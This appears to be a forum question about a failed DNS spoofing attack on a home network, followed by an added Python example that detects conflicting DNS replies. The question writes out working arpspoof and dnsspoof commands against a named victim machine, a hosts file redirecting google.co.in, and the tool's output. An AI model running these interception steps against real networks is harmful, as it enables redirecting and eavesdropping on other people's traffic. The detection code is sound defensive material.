My aim is to DNSspoof.
My network is using a wireless router with the address 192.168.1.1 and primary DNS is the same as the router address.
I have enabled kernel IP forwarding in Linux.
The DNS hosts file is spoofhosts.txt:
173.252.74.22 google.co.in
My victim machine is 192.168.1.224
I have done ARPspoof using
#sudo arpspoof -t 192.168.1.224 192.168.1.1 -i wlan0
#sudo arpspoof -t 192.168.1.1 192.168.1.224 -i wlan0
and I have done DNSspoof
ashok@c:~$ sudo dnsspoof -f spoofhosts.txt -i wlan0 host 192.168.1.224 and udp port 53
[sudo] password for ashok:
dnsspoof: listening on wlan0 [host 192.168.1.224 and udp port 53]
192.168.1.224.15703 > 192.168.1.1.53: 32219+ A? google.co.in
192.168.1.224.15703 > 192.168.1.1.53: 32219+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53: 3788+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53: 3788+ A? google.co.in
I am getting the above responses, but DNSspoofing is not working for the victim.
However, I have observed the traffic in Wireshark on the victim system. From that, I have observed that the DNS response is coming from the router faster than mine.
See the second line, which gives the response directly from the router with a valid Google IP.
How do I solve this? Is this a problem with the DNSspoof command? What happened?
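
Seen from the defender's side, the race described in the post leaves a detectable trace: one DNS query answered twice with different addresses. The following is an added example, not part of the original post; the log format, the `conflicting_responses` name and the 203.0.113.10 address are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed capture of DNS responses as seen at the client, in a simplified
# tcpdump-like form: "<time> <server>.53 > <client>.<port>: <txid> A <ip>[,<ip>]".
# 203.0.113.10 is a constructed stand-in for the genuine answer.
SAMPLE = """\
0.010 192.168.1.1.53 > 192.168.1.224.15703: 32219 A 203.0.113.10
0.042 192.168.1.1.53 > 192.168.1.224.15703: 32219 A 173.252.74.22
0.300 192.168.1.1.53 > 192.168.1.224.14489: 3788 A 203.0.113.10
0.301 192.168.1.1.53 > 192.168.1.224.14489: 3788 A 203.0.113.10
"""

LINE = re.compile(r"(\S+) (\S+)\.(\d+) > (\S+)\.(\d+): (\d+) A (\S+)$")


def conflicting_responses(capture, window=2.0):
    """Flag transactions answered more than once with different address sets."""
    # A forged reply carries the resolver's source address, so the source IP
    # cannot tell the two apart; compare the answers per transaction instead.
    seen = defaultdict(list)  # (client, port, server, txid) -> [(time, answers)]
    alerts = []
    for line in capture.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, server, sport, client, cport, txid, ips = m.groups()
        if sport != "53":
            continue  # not a response from a DNS server port
        ts = float(ts)
        key = (client, cport, server, txid)
        answers = frozenset(ips.split(","))  # set: record order is irrelevant
        for prev_ts, prev_answers in seen[key]:
            if ts - prev_ts <= window and answers != prev_answers:
                alerts.append({"client": client, "txid": int(txid),
                               "first": sorted(prev_answers),
                               "later": sorted(answers)})
                break
        seen[key].append((ts, answers))
    return alerts


if __name__ == "__main__":
    for alert in conflicting_responses(SAMPLE):
        print(alert)
```

An identical retransmitted response (transaction 3788 in the sample) is not flagged; only a second answer that disagrees with the first one is.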